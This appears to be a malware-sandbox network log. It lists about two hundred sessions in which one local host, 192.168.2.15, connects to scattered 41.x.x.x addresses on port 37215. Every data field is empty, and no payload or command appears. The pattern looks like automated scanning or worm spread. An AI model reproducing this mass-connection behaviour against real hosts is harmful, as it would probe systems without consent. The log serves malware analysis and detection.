                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22976192.168.2.153814441.153.194.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22977192.168.2.155824241.218.92.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22978192.168.2.155958641.201.68.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22979192.168.2.154646241.247.252.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22980192.168.2.156048241.161.153.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22981192.168.2.154900641.123.152.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22982192.168.2.154970641.222.7.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22983192.168.2.154520641.171.29.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22984192.168.2.153626441.154.230.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22985192.168.2.155033641.139.33.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22986192.168.2.155007041.222.94.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22987192.168.2.154378041.222.88.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22988192.168.2.155678041.121.12.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22989192.168.2.155745241.115.92.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22990192.168.2.154523841.206.90.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22991192.168.2.155718041.159.235.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22992192.168.2.154286441.13.173.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22993192.168.2.154181241.208.5.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22994192.168.2.154480441.225.247.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22995192.168.2.154475841.237.240.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22996192.168.2.153330041.97.37.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22997192.168.2.153891841.11.219.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22998192.168.2.154658441.186.104.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22999192.168.2.155592041.10.143.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23000192.168.2.153797841.112.64.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23001192.168.2.154375441.204.242.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23002192.168.2.153368441.0.184.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23003192.168.2.154863041.171.230.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23004192.168.2.155277641.204.129.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23005192.168.2.153450641.194.27.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23006192.168.2.155692041.26.135.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23007192.168.2.155874641.16.47.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23008192.168.2.155613041.91.150.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23009192.168.2.153717841.88.113.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23010192.168.2.153433041.86.128.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23011192.168.2.154560441.221.172.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23012192.168.2.155233441.153.186.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23013192.168.2.153282641.19.100.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23014192.168.2.153940841.97.67.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23015192.168.2.155204641.189.108.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23016192.168.2.154780241.226.192.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23017192.168.2.155914041.205.36.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23018192.168.2.154351641.3.46.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23019192.168.2.155581841.5.25.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23020192.168.2.154696841.109.71.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23021192.168.2.153706241.171.170.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23022192.168.2.155676641.9.47.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23023192.168.2.154525841.150.244.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23024192.168.2.155854241.79.16.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23025192.168.2.154885641.35.253.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23026192.168.2.154681441.56.101.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23027192.168.2.155767641.1.22.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23028192.168.2.153716841.161.232.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23029192.168.2.153400641.53.254.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23030192.168.2.153586241.131.167.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23031192.168.2.154285441.43.51.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23032192.168.2.154594441.3.160.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23033192.168.2.155752841.199.183.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23034192.168.2.155016041.182.161.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23035192.168.2.153957641.140.89.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23036192.168.2.154774241.112.12.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23037192.168.2.155358441.92.224.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23038192.168.2.155134441.139.70.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23039192.168.2.155671641.14.121.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23040192.168.2.155067841.50.149.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23041192.168.2.155165841.177.7.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23042192.168.2.154923641.20.132.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23043192.168.2.155013641.152.75.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23044192.168.2.155099241.251.230.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23045192.168.2.155623241.102.129.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23046192.168.2.154784841.13.172.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23047192.168.2.154914041.211.93.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23048192.168.2.155050241.179.51.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23049192.168.2.154743041.74.135.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23050192.168.2.155436241.144.2.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23051192.168.2.154105441.254.137.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23052192.168.2.153689841.208.26.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23053192.168.2.155043041.45.20.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23054192.168.2.153646641.133.155.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23055192.168.2.154716241.84.174.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23056192.168.2.154248041.207.166.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23057192.168.2.155134841.174.99.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23058192.168.2.154172641.185.229.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23059192.168.2.155268041.114.169.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23060192.168.2.154608041.195.130.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23061192.168.2.155402641.74.135.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23062192.168.2.155917641.212.242.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23063192.168.2.155004441.134.107.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23064192.168.2.155530441.150.174.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23065192.168.2.154718441.164.197.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23066192.168.2.155884041.227.146.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23067192.168.2.153401641.23.94.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23068192.168.2.154897241.191.173.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23069192.168.2.155947841.197.103.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23070192.168.2.155643041.235.181.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23071192.168.2.154131241.60.147.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23072192.168.2.155240641.134.162.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23073192.168.2.154533841.195.103.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23074192.168.2.155539041.97.222.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23075192.168.2.156020041.149.238.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23076192.168.2.153905441.91.210.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23077192.168.2.154408441.214.188.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23078192.168.2.155511241.79.96.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23079192.168.2.154224041.211.78.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23080192.168.2.155659641.227.134.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23081192.168.2.153563641.53.141.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23082192.168.2.154958641.226.68.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23083192.168.2.153966441.108.145.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23084192.168.2.155324241.167.176.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23085192.168.2.155829641.22.215.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23086192.168.2.153786841.119.165.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23087192.168.2.153525441.230.90.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23088192.168.2.155752041.82.133.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23089192.168.2.154679041.222.116.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23090192.168.2.156017641.29.76.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23091192.168.2.153348641.92.163.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23092192.168.2.154647441.192.251.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23093192.168.2.156005641.211.249.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23094192.168.2.154705841.194.86.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23095192.168.2.154041841.192.180.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23096192.168.2.153427041.155.154.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23097192.168.2.154578441.54.27.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23098192.168.2.155960241.14.171.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23099192.168.2.155877641.29.20.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23100192.168.2.155359641.46.197.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23101192.168.2.154954641.224.175.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23102192.168.2.154854841.109.194.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23103192.168.2.153733841.9.109.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23104192.168.2.154776441.241.99.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23105192.168.2.155283241.25.6.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23106192.168.2.155238841.96.126.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23107192.168.2.153803641.28.33.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23108192.168.2.153419641.148.100.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23109192.168.2.155912641.231.134.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23110192.168.2.153772241.62.255.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23111192.168.2.154100641.6.204.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23112192.168.2.153514841.220.171.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23113192.168.2.154458641.109.120.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23114192.168.2.154310041.225.5.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23115192.168.2.154924441.119.192.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23116192.168.2.154660641.123.109.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23117192.168.2.155225641.92.234.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23118192.168.2.155716641.54.101.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23119192.168.2.154471041.148.78.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23120192.168.2.153821241.50.190.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23121192.168.2.155389241.147.174.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23122192.168.2.153970841.201.205.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23123192.168.2.153905241.34.238.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23124192.168.2.155726441.99.250.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23125192.168.2.155158641.40.191.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23126192.168.2.154253441.147.94.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23127192.168.2.155205841.2.59.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23128192.168.2.154327241.90.194.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23129192.168.2.154711041.216.23.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23130192.168.2.154105441.60.85.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23131192.168.2.153997041.131.118.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23132192.168.2.155664841.29.133.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23133192.168.2.154294441.234.102.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23134192.168.2.154821841.206.71.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23135192.168.2.155633041.243.31.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23136192.168.2.155078041.54.67.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23137192.168.2.155248841.156.153.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23138192.168.2.155736041.48.45.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23139192.168.2.154232241.20.136.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23140192.168.2.153359241.41.191.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23141192.168.2.154510241.118.33.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23142192.168.2.154953441.155.109.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23143192.168.2.155302641.18.12.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23144192.168.2.153722241.92.20.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23145192.168.2.154468241.11.210.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23146192.168.2.153334841.59.193.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23147192.168.2.154844841.130.208.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23148192.168.2.153664641.208.76.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23149192.168.2.154589441.7.34.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23150192.168.2.155322641.206.44.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23151192.168.2.155959441.66.157.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23152192.168.2.155642041.0.191.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23153192.168.2.153951441.137.99.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23154192.168.2.153467841.39.210.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23155192.168.2.155192041.247.241.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23156192.168.2.154933041.176.32.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23157192.168.2.153331641.4.87.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23158192.168.2.155661241.187.87.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23159192.168.2.155015641.70.163.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23160192.168.2.155436241.150.101.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23161192.168.2.154057241.50.212.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23162192.168.2.154193241.223.249.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23163192.168.2.154355241.255.223.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23164192.168.2.154869841.216.82.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23165192.168.2.155287841.27.132.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23166192.168.2.154826241.22.11.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23167192.168.2.154805241.137.191.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23168192.168.2.154126041.174.42.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23169192.168.2.154074841.238.23.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23170192.168.2.155981041.151.41.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23171192.168.2.156098641.207.254.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23172192.168.2.153877441.233.231.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23173192.168.2.153891441.76.231.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23174192.168.2.154117641.141.217.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23175192.168.2.154753041.199.97.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23176192.168.2.155476441.71.61.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23177192.168.2.155299041.130.84.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23178192.168.2.154919241.74.50.18837215
